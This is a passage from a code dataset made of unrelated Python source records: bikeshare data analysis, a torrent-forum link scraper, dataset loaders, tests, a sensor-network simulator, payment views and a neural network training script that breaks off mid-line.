msg_b.decode('utf8')\n if \"Hello world\" in msg:\n print(msg)\n except ValueError:\n continue\n except KeyboardInterrupt:\n break\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"002_hello_world.py","file_name":"002_hello_world.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"72992656","text":"import time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n city - name of the city to analyze\n month - name of the month to filter by, or \"all\" to apply no month filter\n day - name of the day of week to filter by, or \"all\" to apply no day filter\n All inputs are string formatted\n \"\"\"\n Welcome_msg = \"Hello! My name is Python.Js and i\\'m delighted to be your acquaintance to walk through some US bikeshare data with you!.\"\n print(Welcome_msg)\n print()\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n available_data = 'Now, Bikeshare Data is only available for New York, Chicago And Washington. Enter city here: '\n city = input(available_data).lower()\n while city not in CITY_DATA:\n city = input('Invalid city name. Try Again?: ').lower()\n\n print()\n # get user input for month (all, january, february, ... , june)\n Investigate_months = 'Again, Bikeshare Data is only available from January to June. \\nSelect the month you want to explore or enter \"all\" \\nto explore all the months simultaneously here: '\n month = input(Investigate_months).lower()\n MONTHS = ['all', 'january', 'february', 'march', 'april', 'may', 'june']\n while month not in MONTHS:\n month = input('Invalid month name entered. Try Again?: ').lower()\n\n print()\n # get user input for day of week (all, monday, tuesday, ... 
sunday)\n day = input('Enter a specific day of the week or \\nenter \"all\" to explore all days of the week simultaneously: ').lower()\n DAYS = ['all', 'sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday' ]\n while day not in DAYS:\n day = input('Invalid day name! Try Again?: ').lower()\n\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n city - name of the city to analyze\n month - name of the month to filter by, or \"all\" to apply no month filter\n day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n All inputs are string formatted\n \"\"\"\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # create month column\n df['month'] = df['Start Time'].dt.month\n\n #create weekdays column\n df['day_of_the_week'] = df['Start Time'].dt.weekday_name\n\n #create Time column\n df['Hour'] = df['Start Time'].dt.hour\n\n\n #create a dataframe filtered with only a specified month\n if month != 'all':\n # use the index of the months list to get the corresponding int\n MONTHS = ['january', 'february', 'march', 'april', 'may', 'june']\n month = MONTHS.index(month) + 1\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_the_week'] == day.title()]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # create a month column\n df['month'] = df['Start Time'].dt.month\n\n # display the most common month\n MONTHS = ['All', 'January', 'February', 'March', 'April', 'May', 'June']\n Most_common_month = df['month'].value_counts().idxmax()\n print(f'Most common month for Travelling is {Most_common_month}.')\n\n #create weekdays column\n df['day_of_the_week'] = df['Start Time'].dt.weekday_name\n\n # display the most common day of week\n DAYS = ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday' ]\n Most_common_day_of_the_week = df['day_of_the_week'].mode()[0]\n print(f'The most common day of the week for Travelling is {Most_common_day_of_the_week}.')\n\n\n #create Time column\n df['Hour'] = df['Start Time'].dt.hour\n\n # display the most common start hour\n Most_preferred_hour = df['Hour'].mode()[0]\n print(f'The most preferred time for traveling is {Most_preferred_hour}.')\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # Get to know the most commonly used start station\n Most_preferred_start_station = df['Start Station'].value_counts().idxmax()\n print('The most preferred Start Station is: ', Most_preferred_start_station)\n\n # Get to know the most commonly used end station\n Most_preferred_end_station = df['End Station'].value_counts().idxmax()\n print('The most preferred End Station is: ', 
Most_preferred_end_station)\n\n\n # Get to know most frequent combination of start station and end station trip\n Most_preferred_Start_End_Trip = df[['Start Station', 'End Station']].mode().loc[0]\n print('The most preferred Start-End Trip is from {} to {}.'.format(Most_preferred_Start_End_Trip[0], Most_preferred_Start_End_Trip[1]))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n Total_time_travel = df['Trip Duration'].sum()\n print('Total time travel is {} seconds.'.format(Total_time_travel))\n\n\n # display mean travel time\n Mean_travel_time = df['Trip Duration'].mean()\n print('Average Total Trip duration is {} seconds.'.format(Mean_travel_time))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n User_Types = df['User Type'].value_counts()\n print('categories of users: ''\\n', User_Types)\n\n # Display counts of gender\n if 'Gender' in df.columns:\n gender_counts = df['Gender'].value_counts()\n print('Total gender counts = \\n', gender_counts)\n\n # Display earliest, most recent, and most common year of birth\n if 'Birth Year' in df.columns:\n Earliest_birth_year = df['Birth Year'].min()\n Recent_birth_year = df['Birth Year'].max()\n common_birth_year = df['Birth Year'].mode()[0]\n print('Earliest birth year is {}, Recent birth year {} and common birth year is {}.'.format(Earliest_birth_year, Recent_birth_year, common_birth_year))\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n restart = input('\\nWould you like to restart? 
Enter yes or no.\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare_2.py","file_name":"bikeshare_2.py","file_ext":"py","file_size_in_byte":7685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"539286552","text":"from urllib import request\nfrom bs4 import BeautifulSoup\n\n\"\"\"\n Fetch torrents from btbtt\n\"\"\"\n#http://www.btbtt.us/forum-index-fid-951-page-1.htm\nurl = 'http://www.btbtt.us/forum-index-fid-951-page-'\nthread_prefix_url = 'http://www.btbtt.us/'\nheader = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}\ni = 1\ntemp_url = url+str(i)+'.htm'\nreq = request.Request(temp_url,headers=header)\nrep = request.urlopen(req)\nthread_list_html = rep.read().decode('utf-8')\nsoup = BeautifulSoup(thread_list_html, 'html.parser')\ntables = BeautifulSoup.find_all(soup, name='a', attrs={'class':'subject_link thread-new'})\nit = iter(tables)\n# iterate over every thread and fetch the attachment name and URL\nfor x in it:\n thread_url = x.attrs['href']\n req = request.Request(thread_prefix_url+thread_url,headers=header)\n thread_html = request.urlopen(req).read().decode('utf-8')\n soup = BeautifulSoup(thread_html,'html.parser')\n div = soup.find_all(name='div',attrs={'class':'attachlist'})\n attach = div[0].contents[1].contents[5].contents[1].contents[1]\n attach_href = attach.attrs['href']\n attach_href = attach_href.replace('dialog','download')\n attach_name = attach.text\n print(\"attach_name =\",attach_name,',attach_href =',attach_href)\n\n#http://www.btbtt.us/attach-download-fid-951-aid-4741003.htm\n\n","sub_path":"bt_demo.py","file_name":"bt_demo.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"453973639","text":"import os\nimport os.path as osp\nfrom torchvision.datasets import VisionDataset\nfrom PIL import Image\n\n\nclass RESISC45(VisionDataset):\n '''\n http://www.escience.cn/people/JunweiHan/NWPU-RESISC45.html\n '''\n\n root = '/data/public/rw/datasets/aerial_inspection/NWPU-RESISC45'\n\n def __init__(self, transforms=None, transform=None, target_transform=None):\n super().__init__(root=self.root, transforms=transforms,\n transform=transform, target_transform=target_transform)\n\n self.classes = sorted(os.listdir(self.root))\n self._files = list()\n self.labels = list()\n\n for cls_nm in self.classes:\n class_img_root = osp.join(self.root, cls_nm)\n cls_files = sorted([osp.join(class_img_root, img)\n for img in os.listdir(class_img_root)\n if img.endswith('jpg')])\n self._files += cls_files\n self.labels += [self.classes.index(cls_nm)] * len(cls_files)\n\n def __len__(self):\n return len(self._files)\n\n def __getitem__(self, i):\n imfile = self._files[i]\n image = Image.open(imfile).convert('RGB')\n target = self.labels[i]\n\n if self.transforms is not None:\n image, target = self.transforms(image, target)\n return image, target\n","sub_path":"submodules/datasets/datasets/aerial/aerial_classification.py","file_name":"aerial_classification.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"118241865","text":"# several functions interfacing with a settings file:\n# - read_settings: read from the settings file into a dictionary\n# - write_settings: write from a dictionary into the settings file (not made yet)\n\n# settings file uses the format:\n# - 
\"#\" at the start of a line disregards that line (for comments)\n# - blank lines are disregarded\n# - whitespace around \"=\" is disregarded\n# - variable names should be capitalized, but will be in the settings dictionary\n\n# example settings:\n# # EXAMPLE SETTINGS FILE\n# \n# SOME_VARIABLE = \"GitHub\"\n# ANOTHER_VARIABLE = True\n# YET_ANOTHER_VARIABLE = 1234 \n\n# settings dictionary uses the format:\n# - key is a capitalized string (\"SOME_VARIABLE\")\n# - value is also a string (\"GitHub\", \"True\", \"1234\")\n# - use int() or other such functions to convert from strings\n\n\n# read_settings() reads the settings file and returns the settings dictionary\ndef read_settings():\n settings = {}\n with open(\"./settings\", \"r\") as settings_file:\n lines = settings_file.readlines()\n for line in lines:\n if line[0] == \"#\": # disregard # (comments)\n continue\n if line == \"\\n\" or line == \"\": # disregard blank lines\n continue\n\n first_equal_sign = line.find(\"=\") # values may have equal signs!\n variable_name = line[0:first_equal_sign]\n # accounts for spacing to the left of the \"=\" in the settings file\n # (but not if the variable is a space for some reason)\n if variable_name[-1] == \" \" and variable_name != \" \":\n variable_name = variable_name[:-1] # removes the last digit from the string\n variable_name = variable_name.upper()\n \n # accounts for spacing to the right of the \"=\" in the settings file\n # (but not if the value is a space for some reason)\n value = line[first_equal_sign+1:]\n # removes the newline character from the value if it exists\n if value[-1] == \"\\n\":\n value = value[:-1]\n if value[0] == \" \" and value != \" \":\n value = value[1:] # removes the last digit from the string\n value = value\n \n settings[variable_name] = value\n \n return settings\n\n# write_settings() takes a settings dictionary and writes it to the settings file \ndef write_settings(settings):\n # not yet implemented\n return\n \n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"651517744","text":"import pytest\nfrom random import randint\n\nfrom src.circuits.share import Share\n\n\n@pytest.mark.parametrize(\n \"share,const,mod,expected\",\n [(2,2,13,4),(1,2,11,3),(14,15,43,29),\n (21,6,23,4),(100,200,5,0),(14,-6,43,8),\n (51,-53,11003,11001)]\n)\ndef test_const_add(share,const,mod,expected):\n a = randint(0,mod-1)\n b = randint(0,mod-1)\n c = (-(a+b)) % mod\n\n share1 = Share(a, c - share, mod=mod, fp_prec=0)\n share2 = Share(b, a - share, mod=mod, fp_prec=0)\n\n share1_add = share1.const_add(const)\n share2_add = share2.const_add(const)\n\n assert expected == (share1_add.unshare(share2_add) % mod)\n\n@pytest.mark.parametrize(\n \"share,const,mod,fpp,expected\",\n [(2,2,11003,2,4),(1,2,11003,1,3),(14,15,43,0,29),\n (21,6,23,0,4),(100,200,5,0,0),(14,-6,43,0,8),\n (51,-53,11003,1,11001)]\n)\ndef test_const_add_scale(share,const,mod,fpp,expected):\n scale = 10**fpp\n share = share * scale\n\n a = randint(0,mod-1)\n b = randint(0,mod-1)\n c = (-(a+b)) % mod\n\n share1 = Share(a, c - share, mod=mod, fp_prec=fpp)\n share2 = Share(b, a - share, mod=mod, fp_prec=fpp)\n\n share1_add = share1.const_add(const,scaled=False)\n share2_add = share2.const_add(const,scaled=False)\n\n assert expected * scale == (share1_add.unshare(share2_add) % mod)\n\n@pytest.mark.parametrize(\n \"share,const,mod,expected\",\n 
[(2,2,13,4),(1,2,11,2),(3,3,17,9),(14,2,5,3)]\n)\ndef test_const_mult(share,const,mod,expected):\n\n a = randint(0,mod-1)\n b = randint(0,mod-1)\n c = (-(a+b)) % mod\n\n share1 = Share(a, c - share, mod=mod, fp_prec=0)\n share2 = Share(b, a - share, mod=mod, fp_prec=0)\n\n share1_mult = share1.const_mult(const)\n share2_mult = share2.const_mult(const)\n\n assert expected == (share1_mult.unshare(share2_mult) % mod)\n\n@pytest.mark.parametrize(\n \"share,old_prec,new_prec,mod,expected\",\n [(20,1,0,43,2),(300,2,1,1009,30),(1400,2,1,11003,140),(20,1,3,11003,2000)]\n)\ndef test_switch_precision(share,old_prec,new_prec,mod,expected):\n a = randint(0,mod-1)\n b = randint(0,mod-1)\n c = (-(a+b)) % mod\n\n share1 = Share(a, c - share, mod=mod, fp_prec=old_prec)\n share2 = Share(b, a - share, mod=mod, fp_prec=old_prec)\n\n share1_new = share1.switch_precision(new_prec)\n share2_new = share2.switch_precision(new_prec)\n\n assert expected == (share1_new.unshare(share2_new) % mod)\n\n@pytest.mark.parametrize(\n \"share1,share2,mod,fpp,expected\",\n [((1,1),(1,1),11,0,True),((1,2),(12,13),11,0,True),((1,5),(1,4),11,0,False)]\n)\ndef test_eq(share1,share2,mod,fpp,expected):\n shr1 = Share(share1[0],share1[1],mod=mod,fp_prec=fpp)\n shr2 = Share(share2[0],share2[1],mod=mod,fp_prec=fpp)\n\n assert (shr1 == shr2) == expected","sub_path":"tests/src/circuits/test_share.py","file_name":"test_share.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"340949175","text":"from src.utils.tk import TKUtils\n\nfrom src.view.student.actions import Actions\nfrom src.view.student.list import StudentList\n\n\nclass Student(TKUtils.Container()):\n\n def __init__(self, master, controller, commands):\n super().__init__(master=master)\n self.pack(side='bottom')\n\n self.commands = commands\n self.__controller = controller\n\n self.actions = None\n self.student_list = None\n\n self._create_student_list()\n self._create_actions()\n\n def _create_student_list(self):\n commands = {}\n\n commands['raffle'] = self.commands['raffle']\n\n if not self.student_list:\n self.student_list = StudentList(master=self, commands=commands)\n\n def _create_actions(self):\n commands = {}\n\n commands['raffle'] = self.commands['raffle']\n commands['browse_file'] = self.__controller.browse_file_button\n\n self.actions = Actions(master=self, commands=commands)\n","sub_path":"src/view/student/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"164585479","text":"#!/usr/bin/python\nimport argparse\nfrom math import sqrt\n\ndef main():\n parser = argparse.ArgumentParser(description='Convert a HepEVT file from SuperCHIC.')\n parser.add_argument('input', help='input HepEVT file')\n parser.add_argument('--output', help='output event file', type=str)\n parser.add_argument('--xsect', help='process cross section', type=float)\n parser.add_argument('--xsect_err', help='error on the process cross section', type=float)\n args = parser.parse_args()\n\n output_file = args.output\n if not args.output:\n output_file = args.input.replace('.hepevt', '.evt')\n xsect = args.xsect\n if not args.xsect:\n xsect = 0.0\n xsect_err = args.xsect_err\n if not args.xsect_err:\n xsect_err = 0.0\n\n out = open(output_file, 'w')\n\n block = ''\n in_init = False\n in_event = False\n ini_info = {}\n for l in open(args.input):\n if '<event>' in l:\n in_event = 
True\n block += l\n elif '</event>' in l:\n in_event = False\n block += l\n block = convert_event_block(block, ini_info)\n out.write(block)\n block = ''\n elif in_init:\n l = l.split()\n if len(l)>4: #incoming particles' block\n in1_pdg, in2_pdg, in1_pz, in2_pz = l[0:4]\n ini_info = {'in1_pdg': in1_pdg, 'in1_pz': in1_pz,\n 'in2_pdg': in2_pdg, 'in2_pz': in2_pz}\n elif (xsect>0. or xsect_err>0.) and len(l)==4: #xsection/QCD/QED constants\n l[0] = '%.9E' % (xsect)\n l[1] = '%.9E' % (xsect_err)\n out.write('\\t'.join(l)+'\\n')\n elif in_event:\n block += l\n else:\n out.write(l)\n\n if '<init>' in l:\n in_init = True\n elif '</init>' in l:\n in_init = False\n\n\ndef convert_event_block(block, ini_info):\n out = ''\n npart = 0\n for l in block.split('\\n'):\n l = l.split()\n if len(l)==0: continue\n if len(l)>1 and len(l)<10: #in header\n l[0] = str(int(l[0])+2)\n out += ' '.join(l)+'\\n'\n part1_mass = part2_mass = '0.000000000E+00'\n if int(ini_info['in1_pdg'])==2212: part1_mass = '0.938272046E+00'\n if int(ini_info['in2_pdg'])==2212: part2_mass = '0.938272046E+00'\n part1_ene = sqrt(float(ini_info['in1_pz'])**2+float(part1_mass)**2)\n part2_ene = sqrt(float(ini_info['in2_pz'])**2+float(part2_mass)**2)\n out += '\\t'.join([\n ini_info['in1_pdg'], '-1', '0', '0', '0', '0',\n '0.000000000E+00', '0.000000000E+00', ini_info['in1_pz'],\n '%.9E' % (part1_ene), part1_mass,\n '0.', '9.'])+'\\n'\n out += '\\t'.join([\n ini_info['in2_pdg'], '-1', '0', '0', '0', '0',\n '0.000000000E+00', '0.000000000E+00', '-'+ini_info['in2_pz'],\n '%.9E' % (part2_ene), part2_mass,\n '0.', '9.'])+'\\n'\n elif len(l)>2:\n if npart==0: #first outgoing proton\n l[2] = '1'\n elif npart==1: #second outgoing proton\n l[2] = '2'\n else:\n l[2] = str(int(l[2])+2)\n out += '\\t'.join(l)+'\\n'\n npart += 1\n else:\n out += '\\t'.join(l)+'\\n'\n return out\n\nif __name__=='__main__':\n main()\n","sub_path":"utils/superchic_converter_hepevt.py","file_name":"superchic_converter_hepevt.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"615669595","text":"import csv\n\nfrom scipy.spatial import distance\n\nimport Simulator.parameter as para\nfrom network_method import uniform_com_func, to_string, count_package_function, network_partition\n\n\nclass Network:\n def __init__(self, list_node=None, mc_list=None, target=None, package_size=400, nb_charging_pos=81):\n self.node = list_node\n self.set_neighbor()\n self.set_level()\n self.mc_list = mc_list\n self.target = target\n self.charging_pos = []\n self.package_size = package_size\n self.nb_charging_pos = nb_charging_pos\n self.active = False\n self.package_lost = False\n\n def set_neighbor(self):\n for node in self.node:\n for other in self.node:\n if other.id != node.id and distance.euclidean(node.location, other.location) <= node.com_ran:\n node.neighbor.append(other.id)\n\n def set_level(self):\n queue = []\n for node in self.node:\n if distance.euclidean(node.location, para.base) < node.com_ran:\n node.level = 1\n queue.append(node.id)\n while queue:\n for neighbor_id in self.node[queue[0]].neighbor:\n if not self.node[neighbor_id].level:\n self.node[neighbor_id].level = self.node[queue[0]].level + 1\n queue.append(neighbor_id)\n queue.pop(0)\n\n def partition(self, func=network_partition):\n self.charging_pos = func(self)\n for mc in self.mc_list:\n mc.optimizer.update_charging_pos(self.charging_pos)\n self.active = True\n\n def communicate(self, func=uniform_com_func):\n return func(self)\n\n def run_per_second(self, 
t):\n state = self.communicate()\n request_id = []\n for index, node in enumerate(self.node):\n if node.energy < node.energy_thresh:\n for mc in self.mc_list:\n node.request(optimizer=mc.optimizer, t=t)\n request_id.append(index)\n else:\n node.is_request = False\n if request_id:\n for index, node in enumerate(self.node):\n if index not in request_id and (t - node.check_point[-1][\"time\"]) > 50:\n node.set_check_point(t)\n if self.active:\n for mc in self.mc_list:\n mc.run(network=self, time_stem=t, net=self)\n return state\n\n def simulate_max_time(self, max_time=2000000, file_name=\"log/information_log.csv\"):\n with open(file_name, \"w\") as information_log:\n writer = csv.DictWriter(information_log, fieldnames=[\"time\", \"nb_dead_node\", \"nb_package\"])\n writer.writeheader()\n nb_dead = 0\n nb_package = len(self.target)\n dead_time = 0\n t = 0\n while t <= max_time:\n t = t + 1\n if (t - 1) % 100 == 0:\n print(\"time = \", t, \", lowest energy node: \", self.node[self.find_min_node()].energy, \"at\",\n self.node[self.find_min_node()].location)\n print('\\tnumber of dead node: {}'.format(self.count_dead_node()))\n print('\\tnumber of package: {}'.format(self.count_package()))\n with open(file_name, 'a') as information_log:\n node_writer = csv.DictWriter(information_log, fieldnames=[\"time\", \"nb_dead_node\", \"nb_package\"])\n node_writer.writerow(\n {\"time\": t, \"nb_dead_node\": self.count_dead_node(), \"nb_package\": self.count_package()})\n for mc in self.mc_list:\n print(\"\\tMC#{} at{} is {}\".format(mc.id, mc.current, mc.get_status()))\n\n ######################################\n if t == 200:\n self.partition()\n ######################################\n\n state = self.run_per_second(t)\n current_dead = self.count_dead_node()\n current_package = self.count_package()\n if not self.package_lost:\n if current_package < len(self.target):\n self.package_lost = True\n dead_time = t\n if current_dead != nb_dead or current_package != nb_package:\n nb_dead = current_dead\n nb_package = current_package\n with open(file_name, 'a') as information_log:\n node_writer = csv.DictWriter(information_log, fieldnames=[\"time\", \"nb_dead_node\", \"nb_package\"])\n node_writer.writerow({\"time\": t, \"nb_dead_node\": current_dead, \"nb_package\": current_package})\n\n print('\\nFinished with {} dead sensors, {} packages'.format(self.count_dead_node(), self.count_package()))\n return dead_time, nb_dead\n\n def simulate(self, max_time=2000000, file_name='log/log.csv'):\n if max_time:\n life_time = self.simulate_max_time(max_time=max_time, file_name=file_name)\n else:\n life_time = self.simulate_lifetime(file_name=file_name)\n return life_time\n\n def print_net(self, func=to_string):\n func(self)\n\n def find_min_node(self):\n min_energy = 10 ** 10\n min_id = -1\n for node in self.node:\n if node.energy < min_energy:\n min_energy = node.energy\n min_id = node.id\n return min_id\n\n def count_dead_node(self):\n count = 0\n for node in self.node:\n if node.energy <= 0:\n count += 1\n return count\n\n def count_package(self, count_func=count_package_function):\n count = count_func(self)\n return count\n\n ##############################################################################################\n def simulate_lifetime(self, file_name=\"log/energy_log.csv\"):\n energy_log = open(file_name, \"w\")\n node_log = open('log/dead_node.csv', 'w')\n writer = csv.DictWriter(energy_log, fieldnames=[\"time\", \"mc energy\", \"min energy\"])\n writer.writeheader()\n node_writer = csv.DictWriter(node_log, 
fieldnames=['time', 'dead_node'])\n node_writer.writeheader()\n node_log.close()\n t = 0\n while t <= 2000000:\n t = t + 1\n if (t - 1) % 100 == 0:\n node_log = open('log/dead_node.csv', 'a')\n node_writer = csv.DictWriter(node_log, fieldnames=['time', 'dead_node'])\n node_writer.writerow({\"time\": t, \"dead_node\": self.count_dead_node()})\n node_log.close()\n print('number of dead node: {}'.format(self.count_dead_node()))\n print(\"time = \", t, \", lowest energy node: \", self.node[self.find_min_node()].energy, \"at\",\n self.node[self.find_min_node()].location)\n for mc in self.mc_list:\n print(\"\\tMC#{} at{} is {}\".format(mc.id, mc.current, mc.get_status()))\n state = self.run_per_second(t)\n if not (t - 1) % 50:\n for mc in self.mc_list:\n writer.writerow(\n {\"time\": t, \"mc energy\": mc.energy, \"min energy\": self.node[self.find_min_node()].energy})\n\n print(t, self.node[self.find_min_node()].energy)\n for mc in self.mc_list:\n print(\"\\tMC#{} at{}\".format(mc.id, mc.current))\n writer.writerow({\"time\": t, \"mc energy\": mc.energy, \"min energy\": self.node[self.find_min_node()].energy})\n energy_log.close()\n return t\n","sub_path":"Simulator/Network/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"171730204","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_201_CREATED\nfrom rest_framework.exceptions import ValidationError\nfrom modules.Entities.Payment.Payment import Payment\nfrom modules.Domain.Services.PayPalService import PayPalService\nfrom modules.Application.PluginAdaptor.PayPal.PayPalPluginAdaptor import PayPalPluginAdaptor\n\n\n@api_view(['POST'])\ndef payment_create(request):\n if 'first_name' not in request.data.keys():\n raise ValidationError('First name is missing')\n if 'last_name' not in request.data.keys():\n raise ValidationError('Last name is missing')\n payment = Payment(request.data)\n adaptor = PayPalPluginAdaptor(request.data, payment)\n service = PayPalService(adaptor)\n service.pay()\n return Response(payment.to_string(), status=HTTP_201_CREATED)\n\n\n@api_view(['POST'])\ndef payment_capture(request):\n payment = Payment(request.data)\n adaptor = PayPalPluginAdaptor(request.data, payment)\n service = PayPalService(adaptor)\n service.update()\n return Response(payment.to_string(), status=HTTP_201_CREATED)\n\n\n@api_view(['POST'])\ndef payment_status(request):\n payment = Payment(request.data)\n adaptor = PayPalPluginAdaptor(request.data, payment)\n service = PayPalService(adaptor)\n service.status()\n return Response(payment.to_string(), status=HTTP_201_CREATED)\n","sub_path":"webapps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"281410296","text":"from imports import *\r\n\r\ndef promo(request):\r\n if request.session.get('ismanagerloggedin', False):\r\n data['username']=request.session.get(\"username\")\r\n template = loader.get_template('manager_promo.html')\r\n context = {\r\n 'data': data\r\n }\r\n return HttpResponse(template.render(context, request))\r\n else:\r\n return 
HttpResponseRedirect(\"login\")","sub_path":"manager/views/promo.py","file_name":"promo.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"551077394","text":"\"\"\"\r\nИмя проекта: practicum-1\r\nНомер версии: 1.0\r\nИмя файла: 60.py\r\nАвтор: 2020 © Д.П. Юткина, Челябинск\r\nЛицензия использования: CC BY-NC 4.0 (https://creativecommons.org/licenses/by-nc/4.0/deed.ru)\r\nДата создания: 10/12/2020\r\nДата последней модификации: 10/12/2020\r\nОписание: Решение задачи 60 практикума № 1\r\n#версия Python: 3.8\r\n\"\"\"\r\n\r\n\"\"\"\r\nЗаданы M строк, которые вводятся с клавиатуры.\r\nКаждая строка представляет собой последовательность символов, включающих в себя\r\nвопросительные знаки. Заменить в каждой строке все имеющиеся в��просительные знаки\r\nзвёздочками.\r\n\"\"\"\r\nimport re\r\nM = int(input(\"Введите количество строк: \"))\r\nx = []\r\nfor i in range(0, M):\r\n print(\"Введите строку:\", end=' ')\r\n x.append(input())\r\nfor y in x:\r\n y = re.sub(r'\\?', '*', y)\r\n print(y)\r\n","sub_path":"60.py","file_name":"60.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"389008219","text":"import time\nimport cv2\nimport numpy as np\nimport chainer\nimport glob\nimport os\nimport renom as rm\nfrom renom.cuda.cuda import set_cuda_active, cuGetDeviceCount, cuDeviceSynchronize\nfrom renom import cuda\nfrom renom.utility.trainer import Trainer\nfrom renom.utility.distributor import NdarrayDistributor\nfrom darknet19 import *\nfrom lib.image_generator import *\n\nset_cuda_active(True)\n\n# hyper parameters\ninput_height, input_width = (448, 448)\nitem_path = \"./items\"\nbackground_path = \"./backgrounds\"\n# label_file = \"./data/label.txt\"\nbackup_path = \"./backup\"\nbatch_size = 8\nmax_batches = 3000\nlearning_rate = 0.05\nlr_decay_power = 4\nmomentum = 0.9\nweight_decay = 0.0005\nclasses = 10\nnum_gpu = cuGetDeviceCount()\n\n# load image generator\nprint(\"loading image generator...\")\ngenerator = ImageGenerator(item_path, background_path)\n\n# with open(label_file, \"r\") as f:\n# labels = f.read().strip().split(\"\\n\")\n\n# load model\nprint(\"loading model...\")\nmodel = Darknet19(classes)\nbackup_file = \"%s/backup.h5\" % (backup_path)\nif os.path.isfile(backup_file):\n model.load(backup_file)\n#cuda.get_device(0).use()\n#model.to_gpu() # for gpu\n\ntrainer = Trainer(model,\n batch_size=batch_size,\n loss_func=rm.mean_squared_error,\n num_epoch=1,\n optimizer=rm.Sgd(lr=learning_rate, momentum=momentum), num_gpu=num_gpu)\n\n\n# start to train\nprint(\"start training\")\nfor batch in range(max_batches):\n # generate sample\n x, t = generator.generate_samples(\n n_samples=batch_size,\n n_items=1,\n crop_width=input_width,\n crop_height=input_height,\n min_item_scale=0.1,\n max_item_scale=0.2,\n rand_angle=25,\n minimum_crop=0.8,\n delta_hue=0.01,\n delta_sat_scale=0.5,\n delta_val_scale=0.5\n )\n #x = rm.Variable(x)\n one_hot_t = []\n for i in range(len(t)):\n one_hot_t.append(t[i][0][\"one_hot_label\"])\n #x.to_gpu()\n one_hot_t = np.array(one_hot_t, dtype=np.float32)\n #one_hot_t = rm.Variable(one_hot_t)\n #one_hot_t.to_gpu()\n trainer.train(train_distributor=NdarrayDistributor(x, one_hot_t))\n # with model.train():\n # output = model(x)\n # loss = rm.softmax_cross_entropy(output, one_hot_t)\n\n #loss.to_cpu()\n\n # grad = loss.grad()\n # grad.update(opt)\n # print(\"[batch %d (%d 
